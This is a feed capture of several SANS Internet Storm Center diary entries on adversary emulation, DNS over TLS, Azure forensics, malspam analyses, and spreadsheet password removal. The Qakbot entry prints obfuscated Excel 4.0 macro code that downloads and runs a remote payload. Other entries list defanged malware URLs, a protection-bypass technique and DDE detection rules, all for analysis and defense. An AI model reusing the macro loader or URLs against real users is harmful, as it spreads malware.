Subscribe to SANS hírcsatorna SANS
SANS Internet Storm Center - Cooperative Cyber Security Monitor
Frissítve: 2 óra 50 perc
2021. március 2.

Security Detection & Response Alert Output Usability Survey:, (Tue, Mar 2nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 2.

Adversary Simulation with Sim, (Tue, Mar 2nd)

One of the best ways to test your detection portfolio is to emulate user actions on monitored systems.

I spotted Sim via Twitter and was immediately intrigued as I advocate strongly for any tools and features that enable configurable adversary emulation. Adversary emulation enables blue teams to validate and optimize their detection portfolio and thus determine the true efficacy of their detective capabilities. I do not consider any detection that has not been tested via direct purple or red team engagement, or via automated adversary emulation, as production ready. Per her GitHub repoHope Walker’s Sim is a C# application, configured via an XML file, that performs tasks based on the configuration to resemble user actions on a system in order to facilitate training and education. As a long time SOC and DFIR manager, training for me includes “training” detection and models to ensure optimal performance. IceMoonHSV’s projects appear to be fairly recent contributions to our community, I applaud Hope’s work here and offer a hearty welcome.

Again, referring to her repo content, user actions can be scripted using the task block in an XML configuration file where tasks are comprised of two components:

  • Task configuration: three configuration tags determine the name of the task (for error tracing and configuration), the number of times the task will <loop>, and how long to <pause> between each action.
  • Task actions: Many actions can be configured but it is recommended to maintain task granularity for more narrow, specified testing. Create multiple, scenario based config files, and run individual tests instead. Sim execute <actions> as part of user simulation. Sim performs each action as if scripted, executing one action after the other in sequential order. Sim does not wait for one action to complete before starting another, thus the importance of the <pause> and <sleep> tags.

Read the rest of Hope’s documentation for yourselves, there are plenty of details as to action configurations including <setclipboard>, <getclipboard>, and <plain> for plain text typed as if a user typing sequentially. There are numerous special key options as well as the ability to call executables via <process> and run PowerShell commands with <powershell>.

I built Sim in Visual Studio; it’s posted to GitHub as a source-only project but with a solution file so compiling your own sim.exe is quick and easy. I also created a copy of the admindemo.xml file found in XMLExamples, saved it as sim_toolsmith_demo.xml and made some tweaks to create a more adversarial user.
I’ve shared my modifications for your use and consideration as a Gist.

Calling my demo file with sim.exe is as easy as Sim.exe sim_toolsmith_demo.xml (unique to your file structure) at an admin command prompt.

Figure 1: Sim with actions config file

Rather than talk about it, I captured a video to exhibit Sim’s run through my adversarial user configuration file. Imagine this adversary as a script kiddie who has popped a system and is now searching for hacker tools to expand terrain. You’ll note PowerShell calls as well as command prompt actions. Actions also include Google searches, including multiple browser tabs, as well as keyboard tabs to land on desired search content. This config also saves the Windows Security event log, noteworthy because it could just as easily have cleared it, which should always trigger an alert.

Sim demo video

As you can see, Sim does a great job of emulating user behaviors, and can easily be configured to conduct far more adversarial behaviors as desired. This particular demonstration would likely trigger alerts for web filtering rules intended to block access to hacker tools. Detections that make use of PowerShell logging could certainly be easily tested here as well. And again, if the Security event log had been cleared instead of simply written off to a file, any detection rules or signatures monitoring the 1100 series of Windows Event Logs would have triggered, particularly Event ID 1102 - The audit log was cleared.
I assert that Sim could be batched and automated. You could deploy an entire range of adversary emulations to a central share then call a master file during a desired and scheduled test or emulation window. Group Policy is even an option. Obviously, it is not recommended to fire off Sim jobs designed to emulate adversarial behavior without working with your leadership and any teams who may be monitoring user behaviors. Much like penetration testing, definitely ask for written permission rather than forgiveness after the fact.
I hope Hope will keep developing against this project, the possibilities are endless for adversary emulation scenarios, end Sim is really light and highly flexible. It’s great work, please safely give it a go for yourselves!

Cheers…until next time.

Russ McRee | @holisticinfosec

                (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 2.

ISC Stormcast For Tuesday, March 2nd, 2021;id=7394, (Tue, Mar 2nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 1.

Fun with DNS over TLS (DoT), (Mon, Mar 1st)

Going back a few weeks, we discussed how DNS over HTTPS (DoH) works (  - very much as an unauthenticated API over HTTPS.  But DNS over TLS (DoT) has been with us for a fair bit longer (May 2016), why haven't we heard about it so much?

After wrestling with it for a bit, I can tell you why!

DoH is easy to work with, since we have so many HTTPS tools at our disposal.  Plus DoH was first implemented in browsers, and the browser developers *live* in HTTPS, so DoH is a cake-walk for them.  DNSSEC is basically plain old unencrypted DNS, but with signature records.

DoT on the other hand is a whole 'nother beast.  It's still basic DNS, but encapsulated in TLS.  So to make DoT calls we need a toolset to create TLS packets, then send and validate them using the certificate at the server side.  So the first tool that came to my mind of course was scapy, but read on, I used an easier method ..

To allow all of the mentioned DNS protocols to live on one server, DoT lives on tcp/853.  This makes for an easy NMAP scan if you're looking for this service.  NMAP tags the port correctly, but an NMAP version scan (-sV) won't identify  the DoT service.  It will however find some critical strings in the fingerprint, things like "DNSVersionBindReqTCP" and "DNSStatusRequestTCP" - so a version scan will validate the service enough for your eyes to see it, without calling it out definitively.  You can also of course validate the certificate on port tcp/853 using NMAP's ssl-cert.nse script or openssl:

nmap -p853 --script ssl-cert

Starting Nmap 7.80 ( ) at 2021-03-01 07:55 Eastern Standard Time

Nmap scan report for

Host is up (0.012s latency).



853/tcp open  domain-s

| ssl-cert: Subject: LLC/stateOrProvinceName=California/countryName=US

| Subject Alternative Name:, DNS:*,,,, IP Address:2001:4860:4860:0:0:0:0:64, IP Address:2001:4860:4860:0:0:0:0:6464, IP Address:2001:4860:4860:0:0:0:0:8844, IP Address:2001:4860:4860:0:0:0:0:8888, IP Address:, IP Address:

| Issuer: commonName=GTS CA 1O1/organizationName=Google Trust Services/countryName=US

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2021-01-26T08:54:07

| Not valid after:  2021-04-20T08:54:06

| MD5:   9edd 82e5 5661 89c0 13a5 cced e040 c76d

|_SHA-1: 2e80 c54b 0c55 f8ad 3d61 f9ae af43 e70c 1e67 fafd

Nmap done: 1 IP address (1 host up) scanned in 24.43 seconds

Me, I took the easy way out for DoT queries and installed the knot-dnsutils (sudo apt-get install knot-dnsutils), which installs kdig to do all the heavy lifting for me.  As the name implies, kdig does just about everything that dig does, but for this task gives you parameters to make DoT queries.

So an A record query over DoT from kdig looks just very much like DOS query outpuyt from dig:

$ kdig +tls-ca A

;; TLS session (TLS1.3)-(ECDHE-X25519)-(RSA-PSS-RSAE-SHA256)-(AES-256-GCM)

;; ->>HEADER<<- opcode: QUERY; status: NOERROR; id: 57540

;; Flags: qr rd ra; QUERY: 1; ANSWER: 2; AUTHORITY: 0; ADDITIONAL: 1



;; Version: 0; flags: ; UDP size: 512 B; ext-rcode: NOERROR

;; PADDING: 391 B


;;                IN      A

;; ANSWER SECTION:           4       IN      A           4       IN      A


;; Received 468 B

;; Time 2021-03-01 04:58:51 PST

;; From in 38.9 ms

Note all the TLS session info at the top, and the port number in the last line.

As you'd expect, if you're just after answers you can use the +short parameter:

# kdig +tls-ca +short AAAA

.. yup, I host my website on github, handiest github feature ever (ok, maybe not the handiest, but still pretty darned handy)

Other handy parameters in kdig?

  • Just as in dig, you can always tack on the "-d" parameter for debug output
  • +tls-hostname can be used to over-ride the server name during TLS negotiation.  This means you can even use the server's IP address when you use this parameter.
  • Related to tls-hostname, +tls-sni adds the Server Name Indication field to the request

Without constructing the TLS packet, how can I use DoT in an NMAP script?  I again took the easy way out and used kdig, in combination with the lua command os.execute.  Yup, in the time honoured tradition of coding laziness I shelled out and executed the matching OS command!  In the DoH script I wrote I did a quick check to make sure that the host was running HTTP services on port 443 with "shortport.http".  In the DoT script I changed this, to ensure that TLS is running on the scanned port, using the "shortport.ssl" check.  An example scan is shown below:

$ nmap -p853 --script dns-dot.nse --script-args,query=AAAA

Starting Nmap 7.80 ( ) at 2021-03-01 05:13 PST

Nmap scan report for (

Host is up (0.017s latency).



853/tcp open  domain-s

| dns-dot:





|   2607:f798:d04:189::b33

|_  2607:f798:d04:191::b33


Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

You can find the DoT script here: . Because is calls kdig, you'll need the knot-dnsutils package installed before this script will run.  If you're interested in combining NMAP scans with different OS commands you're welcome to review the source code and use whatever you need!

Do you have a handy nmap script that uses os.execute to do the "behind the scenes" work?  Please, share a link in our comment form!



Usage Profiles for DNS over TLS and DNS over DTLS:



Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 1.

ISC Stormcast For Monday, March 1st, 2021;id=7392, (Mon, Mar 1st)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 1.

Maldocs: Protection Passwords, (Sun, Feb 28th)

In diary entry "Unprotecting Malicious Documents For Inspection" I explain how to deal with protected malicious Excel documents by removing the protection passwords.

I created a new version of my plugin plugin_biff that attempts to recover protection passwords with a dictionary attack.

Here I use it with Brad's malicious spreadsheet sample:

It's not possible to determine if the recovered passwords (piano1 and 1qaz2wsx) are the actual passwords used by the malicious actors, or if they are the result of hash collisions (it's only a 32-bit hash). But they do work: you can remove the protections by using these passwords.


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 27.

Pretending to be an Outlook Version Update, (Fri, Feb 26th)

I received this phishing email yesterday that seemed very strange with this short and urgent message:

"The Classic version of Outlook Mail will be replaced by our new version. So it's time to verify, before you lose your email access."

Holding and hovering my cursor over the URL, it was pointing to a site which has nothing to do with office (www[.]notion[.]so). The site is described as a All-in-one workspace to share information.

Following the URL, the page kind of look legitimate. However, the Outlook mail icon are just pictures, not posible to select anything. Another good give away that something isn't right in the right corner a picture with Notion. The only option is to "Click Here" which lead to the URL in the picture below.

Following the link, Firefox then provide this warning:

This is tax time which is prime for phishing scams (phone or email), they might have already started in your region. This SANS material [3][4], a poster and a training video, are a good reminder how these scam work. They can be shared with family members and coworkers to help them recongnize, detect and avoid being taken by phishing attacks.

Indicator of Compromise

https://www.notion[.]so/OUTLOOK-MAIL-e8a3b1516dd74f589b3d543bb93f6472 [1]
https://mail0.godaddysites[.]com [2]

[3] (Poster)
[4] (SANS Security Awareness: Email and Phishing)

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 26.

ISC Stormcast For Friday, February 26th, 2021;id=7390, (Fri, Feb 26th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 26.

So where did those Satori attacks come from&#x3f;, (Thu, Feb 25th)

Last week I posted about a new Satori variant scanning on TCP port 26 that I was picking up in my honeypots. Things have slowed down a bit, but levels are still above where they had been since mid-July 2020 on %%port:26%%.

In some discussion afterward, a question that came up was where were the attacks coming from. My first thought was to take the IPs and run them through the Maxmind DB to geolocate them and map them. I first looked around to see if there was a Python script that would do the job using the Maxmind and Google Maps APIs. I didn't actually find what I was hoping for. I did find a few things that I can probably make work eventually (and if I have some time after I teach next week), perhaps I'll work more on that. In the meantime, Xavier threw the IPs in Splunk for me and got me some maps to show where the attacks were coming from. Now, it turns out that of the 384 attacks I recorded in 2 of my honeypots over the first 3 or 4 days of the spike, they came from 340 distinct IPs. The verdict is... most of them were coming from Korea. Here's what we got.

And if I zoom in on Asia, we see this

And, finally, I took a look at the US.

So, I'm not sure exactly what to make of all of this. I ran a few of these IPs through Shodan and didn't come up with anything in particular that they seemed to have in common, but maybe I didn't run enough of them.

If nothing else, this has given me some ideas of projects I need to work on when I have some free time. If anyone has any additional insight, I welcome your comments below or via e-mail or our contact page.

Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 25.

ISC Stormcast For Thursday, February 25th, 2021;id=7388, (Thu, Feb 25th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 25.

Forensicating Azure VMs, (Thu, Feb 25th)

With more and more workloads migrating to "the Cloud", we see post-breach forensic investigations also increasingly moving from on-premises to remote instances. If we are lucky and the installation is well engineered, we will encounter a "managed" virtual machine setup, where a forensic agent or EDR (endpoint detection & response) product is pre-installed on our affected VM. Alas, in my experience, this so far seems to be the exception rather than the norm. It almost feels like some lessons learned in the past two decades about EDR have been thrown out again, just because ... "Cloud". 

If you find yourself in such a situation, like I recently did, here is a throwback to the forensics methodology from two decades ago: Creating a disk image, and getting a forensic time line off an affected computer. That the computer is a VM in the Cloud makes things marginally easier, but with modern disk sizes approaching terabytes, disk image timelining is neither elegant nor quick. But it still works.

Lets say we have a VM that has been hacked. In my example, for demonstration purposes, I custom-created a VM named "whacked" in an Azure resource group named "whacked". The subscription IDs and resource IDs below have been obfuscated to protect the not-so-innocent Community College where this engagement occurred.

If you have the Azure CLI installed, and have the necessary privileges, you can use command line / powershell commands do forensicate. I recommend this over Azure GUI, because it allows you to keep a precise log of what exactly you were doing.

First, find out which OS disk your affected VM is using:

powershell> $vm=az vm show --name whacked --resource-group whacked | ConvertFrom-JSON
powershell> $

Then, get more info about that OS disk. This will show for example the size of the OS disk, when it was created, which OS it uses, etc

powershell> $disk=az disk show --ids $

Create a snapshot of the affected disk.  Nicely enough, this can be done while the VM is running. All you need is "Contributor" or "Owner" rights on the resource group or subscription where the affected VM is located

powershell> $snap = az snapshot create --resource-group whacked --name whacked-snapshot-2021FEB20 --source "/subscriptions/366[...]42/resourceGroups/whacked/providers/Microsoft.Compute/disks/whacked_disk1_66a[...]7" --location centralus | ConvertFrom-JSON

Take note of the "location" parameter, it has to match the location of the disk, otherwise you'll get an obscure and unhelpful error, like "disk not found".

powershell> $

Next step, we create a temporary access signature to this snapshot. 

powershell> $sas=(az snapshot grant-access --duration-in-seconds 7200 --resource-group whacked --name whacked-snapshot-2021FEB20 --access-level read --query [accessSas] -o tsv)

This allows us to copy the snapshot out of the affected subscription and resource, to a storage account that we control and maintain for forensic purposes:

powershell> az storage blob copy start --destination-blob whacked-snapshot-2021FEB20 --destination-container images --account-name [removed] --auth-mode login --source-uri "`"$sas`""

Take note of the "`"$sas`"" quotation... this is not mentioned in the Microsoft Docs anywhere, as far as I can tell. But the SAS access signature contains characters like "&" which are interpreted by Powershell as commands, so unless you use this exact way of double-quoting the string, the command will never work, and the resulting error messages will be extremely unhelpful.

The "Account-Name" that I removed is the name of your forensics Azure Storage Account where you have a container named "images".  The copy operation itself is asynchronous, and is gonna take a while. You can check the status by using "az storage blob show", like this:

powershell> (az storage blob show -c images --account-name forensicimage -n whacked-snapshot-2021FEB20 --auth-mode login | ConvertFrom-JSON).properties.copy.progress
powershell> (az storage blob show -c images --account-name forensicimage -n whacked-snapshot-2021FEB20 --auth-mode login | ConvertFrom-JSON).properties.copy.progress

Once both numbers match, all bytes have been copied. In our case, the disk was ~127GB.

Next step, create a new disk from the image. Make sure to pick a --size-gb that is bigger than your image:

powershell> az disk create --resource-group forensicdemo --name whacked-image --sku 'Standard_LRS' --location 'centralus' --size-gb 150 --source "`"https://[removed]`"" 

Then, attach this new disk into a SANS SIFT VM that you have running in Azure for the purpose. In my example, the VM is called "sift" and sits in the resource group "forensicdemo":

powershell> $diskid=$(az disk show -g forensicdemo -n whacked-image --query 'id' -o tsv)
powershell> az vm disk attach -g forensicdemo --vm-name sift --name $diskid

Once this completes, you can log in to the SIFT VM, and mount the snapshot:

root@siftworkstation:~# lsblk
sda       8:0    0     4G  0 disk
  sda1    8:1    0     4G  0 part /mnt
sdb       8:16   0    30G  0 disk
  sdb1    8:17   0  29.9G  0 part /
  sdb14   8:30   0     4M  0 part
  sdb15   8:31   0   106M  0 part /boot/efi
sdc       8:32   0    64G  0 disk /plaso
sdd       8:48   0   150G  0 disk 
  sdd1    8:49   0   500M  0 part
  sdd2    8:50   0 126.5G  0 part
sr0      11:0    1   628K  0 rom

Looks like our image ended up getting linked as "sdd2". Let's mount it

root@siftworkstation:/plaso# mkdir /forensics
root@siftworkstation:/plaso# mount -oro /dev/sdd2 /forensics/
root@siftworkstation:/plaso# ls -al /forensics/Windows/System32/cmd.exe
-rwxrwxrwx 2 root root 289792 Feb  5 01:16 /forensics/Windows/System32/cmd.exe
root@siftworkstation:/plaso# sha1sum /forensics/Windows/System32/cmd.exe
f1efb0fddc156e4c61c5f78a54700e4e7984d55d  /forensics/Windows/System32/cmd.exe

Once there, you can run Plaso /, or forensicate the disk image in any other way desired. If live forensics is more your thing, you can also re-create a VM from the snapshot image (az vm create --attach-os-disk..., with --admin-password and --admin-username parameters to reset the built-in credentials), and then log into it. Of course doing so alters any ephemeral evidence, because you actually boot from the affected disk. But if there is something that you can analyze faster "live", go for it.  After all, you still have the original image in the Azure Storage Account, so you can repeat this step as often as necessary until you got what you need. 

If the VM was encrypted with a custom key, there is an additional hurdle. In this case, $disk.EncryptionSettingsCollection will be "not null", and you additionally need access to the affected subscription's Azure Key Vault, to retrieve the BEK and KEK values of the encrypted disk. If this is the case in your environment, I recommend to take a look at the Microsoft-provided Workbook for Azure forensics, which mostly encompasses the commands listed above, but also supports private key encrypted VM disks.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 24.

ISC Stormcast For Wednesday, February 24th, 2021;id=7386, (Wed, Feb 24th)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 24.

Malspam pushes GuLoader for Remcos RAT, (Wed, Feb 24th)


Malicious spam (malspam) pushing GuLoader malware has been around for over a year now. GuLoader is a file downloader first observed in December 2019, and it has been used to distribute a wide variety of malware, especially malware based on remote administration tools (RATs).  I wrote a blog last year examining malspam using GuLoader for Netwire RAT.  And GuLoader activity has continued since then.

Today's diary reviews a case of malspam pushing GuLoader for Remcos RAT on Tuesday 2021-02-23.

Shown above:  Flow chart for the Remcos RAT infection reviewed in today's diary.

The malspam

Shown above:  Screenshot of the malspam.

The malspam is supposedly from someone in Lowes from Canada.  Below are some email headers associated with this message.

Received: from (unknown [])
Date: 23 Feb 2021 07:18:05 +0100
Subject: New Quotation 2021
Message-ID: <>

As noted above, the sender is supposedly from, but this site is not associated with Lowes. That domain has an open directory for its web server, and it seems like it's being used for malicious purposes.

Shown above: when viewed in a web browser.

The attachment

I opened the attachment in my lab, but I was on a Windows 10 host running a recent version of Microsoft Office.  Initially, I didn't realize this was a document with an exploit targeting CVE-2017-11882.  I had to switch to an older Windows 7 host to get an infection.

Shown above:  Screenshot of the attachment opened in Excel.

The infection traffic

Infection traffic was typical for what I've seen with previous GuLoader infections for some sort of RAT-based malware.  In this case, the infected Windows host was unable to establish a TCP connection with the server used by this sample for Remcos RAT.

Shown above:  Traffic from the infection filtered in Wireshark.

Forensics on the infected Windows host

The infected Windows host had GuLoader persistent on the infected host using a registry update.  When rebooted, the GuLoader sample again retrieved the encoded binary for Remcos RAT.

Shown above:  GuLoader for Remcos RAT persistent on the infected Windows host.

Indicators of Compromise (IOCs)

Associated malware:

SHA256 hash: 21c4c697c6cba3d1d7f5ae5d768bf0c1d716eccc4479b338f2cf1336cf06b8ad

  • File size: 2,231,808 bytes
  • File name: Lowes_Quotation_PN#1092021.xlsx
  • File description: Email attachment, Word doc with exploit for CVE-2017-11882

SHA256 hash: 6141efb6f1598e2205806c5a788e61c489440dfc942984ee1688bb68ad0f18df

  • File size: 106,496 bytes
  • File location: hxxp://mtspsmjeli.sch[.]id/Img/VOP.exe
  • File location: C:\Users\[username]\AppData\Roaming\win.exe
  • File description: Windows EXE, GUI Loader for Remcos RAT

Infection traffic:

GuLoader EXE retrieved through CVE-2017-11882 exploit:

  • 103.150.60[.]242 port 80 - mtspsmjeli.sch[.]id - GET /Img/VOP.exe

GuLoader retrieves encoded data for Remcos RAT:

  • 103.150.60[.]242 port 80 - mtspsmjeli.sch[.]id - GET /cl/VK_Remcos%20v2_AxaGIU151.bin

Remcos RAT post-infection traffic:

  • 192.253.246[.]142 port 2009 - hsyuwbvxczbansmloiujdhsbnbcgywqauaghxvz.ydns[.]eu - attempted TCP connections

Final words

We continue to see new malware samples using exploits based on CVE-2017-11882 in the wild.  This vulnerability is over 3 years old, and exploits targeting it are not effective against the most recent versions of Microsoft Windows and Office.  The only reason we continue to see these new samples is because distributing exploits based on CVE-2017-11882 remains profitable.  That means a substantial number of people still use outdated versions of Microsoft Office and/or Windows that are not properly patched or updated.

GuLoader has been a relatively a constant presence in our threat landscape since it was discovered in December 2019, so I expect we'll also continue to see new samples for various RAT-based malware in the weeks and months ahead.


Brad Duncan
brad [at]

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 23.

Qakbot in a response to Full Disclosure post, (Tue, Feb 23rd)

Given its history, the Full Disclosure mailing list[1] is probably one of the best-known places on the internet where information about newly discovered vulnerabilities is may be published in a completely open way. If one wishes to inform the wider security community about a vulnerability one found in any piece of software, one only has to submit a post and after it is evaluated by the moderators, the information will be published to the list. Whatever your own thoughts on the issues of full or limited disclosure might be, the list can be an interesting source of information.

Couple of years back, I posted a message to the list about a small vulnerability I found in a plugin for the CMS Made Simple content management system[2]. And last week, to my surprise, I received what appeared to be a reply to my post… Although at a first glance, its contents seemed more than a little suspicious.

The headers in the message showed that although it was really sent in a reply to the post from 2019 (the “In-Reply-To” and “References” headers contained the correct message ID of the original mail), it didn’t go through the mailing list itself.

... MIME-Version: 1.0 Date: Thu, 18 Feb 2021 17:39:51 +0100 ... Message-ID: <79D7756F0F0A254E2BAAEC82026BE789678AF944@unknown> Subject: [Jan Kopriva] [FD] Open Redirection vulnerability in Babel (CMSMS Module) ... Content-Type: multipart/mixed; boundary="------------000309030201050000030608" sender: Fulldisclosure <> X-Priority: 3 (Normal) From: techis <athena70@... ... In-Reply-To: <> References: <> ...

The sender address, which may be seen in the picture above (“fulldislosure-bounces … on behalf of”), might make the message appear as if it did originate from the mailing list, however this information, just as the identity of the sender which recipient sees after opening the message, is only based on one of the message headers (in this case “sender”), which means that it may be set almost arbitrarily by the sender.

The attachment contained an XLS file (document-1544458006.xls).

Upon closer inspection, the file turned out to contain Excel 4.0 macros.

In cases of documents with Excel 4.0 macros, I find that to get a quick (and admittedly very dirty) look at their code, it is not a bad idea to simply copy contents of all the Excel sheets with macros into a text file and remove all unnecessary whitespaces. If the macros aren’t heavily obfuscated, this approach may result in something readable. Luckily, this was one of those cases, as you may see from the following code.

=Doc1!AK28() =""&""&""&""&""&""&""&""&""&""&""&""&FORMULA(AP41&"2 ",AD15) =""&""&""&""&""&""&""&""&""&""&""&""&FORMULA(AQ41,AE15) =AE14() =Doc2!AC12()=FORMULA(AO36&AO37&AO38&AO39&AO40&AO41,AO25) =AG24() =CALL(AO25,Doc2!AC13&Doc2!AC12&AG25&"A","JJC"&"CBB",0,Doc1!A100,""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&Doc1!AQ30,0) =AO5() =REPLACE(Doc1!AQ25,6,1,Doc1!AQ26) =REPLACE(AP34,6,1,Doc1!AL12) URLMon egist =AK22() erServer =""&""&""&""&""&""&""&""&""&""&""&""&EXEC(Doc1!AD15&Doc1!AQ30&Doc1!AE15&AG24) r , =HALT() u D n l ..\idefje.ekfd d l l R l 3 File Dow U R L M URL o n rundll3 ,DllR =""&C100 gif =REPLACE(Doc1!AP35,7,7,"nloadTo") =REPLACE(Doc1!AP39,7,7,"") =REPLACE(#REF!AB7&#REF!AB8&#REF!AB9&#REF!AB10&#REF!AB11,7,7,"l3") =Doc1!AH16()

Although there is some elementary obfuscation applied to the code, few of the rows provide a good enough idea of what the macros are probably supposed to do (i.e. most likely download and run the contents of https[:]//jordanbetterworkplace[.]org/ds/1802.gif). The URL was no longer active by the time I got to it, but from a recent analysis of a nearly identical file by the Hatching Triage sandbox[3] as well as threat intelligence data available for the URL itself[4], it is clear that the final payload was supposed to be the Qakbot infostealer.

Although one may only guess at the background, since the e-mail carrying the XLS contained valid message ID of the original e-mail sent to the mailing list in its headers, it is quite probable, that it was really sent in response to the Full Disclosure post. Probably after some threat actor managed to compromise an e-mail account, which was subscribed to the list.

If this was the case, I would however expect not to be the only recipient of a similar message, so if any of our readers is a contributor to the FD list, please let us know in the comments if you’ve received something similar.

Regardless, what brought the message to my attention in the first place (i.e. it appearing as if it was sent through the Full Disclosure mailing list) turned out to be a coincidence more than anything else. It was however a good reminder that similar coincidences do happen and may sometimes lead to recipients receiving very trustworthy looking messages…even though it might not be through intentional activity on the part of the attackers.

Indicators of Compromise (IoCs)
document-1544458006.xls (89 kB)
MD5 - 871f8ff683479dee3546a750e1a04808
SHA1 - 5b1344d6d6148ebdaa508a2b25fa2ce0fed87e57


Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 23.

ISC Stormcast For Tuesday, February 23rd, 2021;id=7384, (Tue, Feb 23rd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 22.

Unprotecting Malicious Documents For Inspection, (Mon, Feb 22nd)

I wanted to take a look at Brad's malicious spreadsheet, using Excel inside a VM.

But I can not make changes or unhide sheets, as the workbook and the sheets are protected:

And the protection password is not "VelvetSweatshop".

Thus I started to remove this protection.

First of all, the malicious spreadsheet is also encrypted: it has an encryption password and protections passwords. But since the encryption password is VelvetSweatshop, the user doesn't have to provide the password to decrypt the document upon opening.

However, I need to decrypt this document first, so that I can remove the protections. I do this with my tool

When an Office document is encrypted with a password, the content of the document is cryptographically encrypted, and you need the password to decrypt the document. That's what I just did.

When an Office document is protected with a password, the content of the document is not encrypted. The content remains readable (cleartext). However, flags are set so that Excel will prevent you from altering the document. I explain how you can remove this protection by clearing the flags and passwords in my blog post "Quickpost: Remove Sheet Protection From Spreadsheets".

For this malicious spreadsheet, I'm going to take a slightly different route: I'm going to "change" the protection passwords (unknown to me) to passwords known to me.

To achieve this, I need to change some bytes in records that make up the Excel spreadsheet. I'm using my tool with plugin plugin_biff to locate these records:

BIFF records PASSWORD contain 2 bytes of data: this is a custom hash of the actual password. When these 2 bytes are 00 00, there is no password.

Here the hashes are 41 CB and 4D 91. I'm going to replace these bytes with AB 94. AB 94 is the hash for password P@ssw0rd. So by replacing these bytes, I "replace" an unknown password by a known password.

I use option -R of plugin_biff to get a complete hexdump of the BIFF records (record-type + record-length + record-data), that I then use with a hexadecimal editor to search for these records in the sample file, and replace the hashes' bytes:

Searching for 1300020041cb:

Replacing 41cb with ab94:

Searching for 130002004d91:

Replacing 4d91 with ab94:

Now I have a malicious spreadsheet, that is still protected (workbook and sheets), but now I know the protection passwords (P@ssw0rd).

Final step: I open this modified malicious spreadsheet with Excel inside a VM, unprotect it with password P@ssw0rd, and inspect the malicious Excel 4 macros:


The Excel 4 macro sheet is hidden, but now I can unhide it because the malicious spreadsheet is no longer protected:

Some closing remarks:

  • In my blog post "Quickpost: Remove Sheet Protection From Spreadsheets" I show how to reset the flags and remove the passwords for protected sheets, here I show how to change the passwords for protected workbook and sheets.
  • I could also crack the hashes in stead of replacing them with a known hash. Since this is a 32-bit hash, I expect that cracking it will be fast. Collisions for a 32-bit hash are not rare, with a brute-force attack it's possible that you would obtain a working password that is not the original password.
  • I could also unhide the sheets with a hexadecimal editor, as explained in diary entry "Excel Maldocs: Hidden Sheets".
  • There are commercial tools that do this manual process for you automatically.


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 22.

ISC Stormcast For Monday, February 22nd, 2021;id=7382, (Mon, Feb 22nd)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 21.

DDE and oledump, (Sun, Feb 21st)

I was asked if the DDE YARA rules I created work with on the sample that Xavier wrote about in his diary entry "Dynamic Data Exchange (DDE) is Back in the Wild?".

These rules can be used with YARA directly:

And you can use YARA's option -s to view the string. It will contain the DDE command:

But these rule do not work with (I designed them to work with YARA): supports YARA rules through option -y: when you use that option, the provided YARA rules are applied to each individual stream in the ole file (not the complete ole file, like YARA itself does).

But the rules for ole files that I created, contain a test to check if the file is an ole file: uint32be(0) == 0xD0CF11E0

If you suppress this test, you can use these rules with oledump:

In stead of suppressing this test, I created 2 new rules without this test:

rule Office_OLE_DDEAUTO_sa {
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase

rule Office_OLE_DDE_sa {
    $a = /\x13\s*DDE\b[^\x14]+/ nocase

And now one of these new rules triggers on the WordDocument stream:

You can use option --yarastrings to display the matched strings:

And I also made a video:


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 20.

Quickie: Extracting HTTP URLs With tshark, (Sat, Feb 20th)

After I posted diary entry "Quickie: tshark & Malware Analysis", someone asked me how to extract HTTP URLs from capture files with tshark.

Use option -r to read a capture file, and options -T fields and -e http.request.full_uri to let tshark print the full URL of HTTP requests. Problem is that tshark will also output an empty line for each packet. I filter these out with findstr or grep:

Please post a comment if you know how you can avoid these empty lines with a tshark option.

It's also possible to print the full protocol packet tree with packet details, and search this for URLs with my tool. The difference here, is that you will find all kinds op URLs, not only for HTTP requests.

For example, many of the URLs seen in this screenshot, are found inside certificates.


Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. február 19.

Dynamic Data Exchange (DDE) is Back in the Wild&#x3f;, (Fri, Feb 19th)

DDE or "Dynamic Data Exchange" is a Microsoft technology for interprocess communication used in early versions of Windows and OS/2. DDE allows programs to manipulate objects provided by other programs, and respond to user actions affecting those objects. FOr a while, DDE was partially replaced by Object Linking and Embedding (OLE) but it's still available in the latest versions of the Microsoft operating system for backward compatibility reasons[1]. If fashion is known to be in a state of perpetual renewal, we could say the same in the cybersecurity landscape. Yesterday, I spotted a malicious Word document that abused this DDE technology.

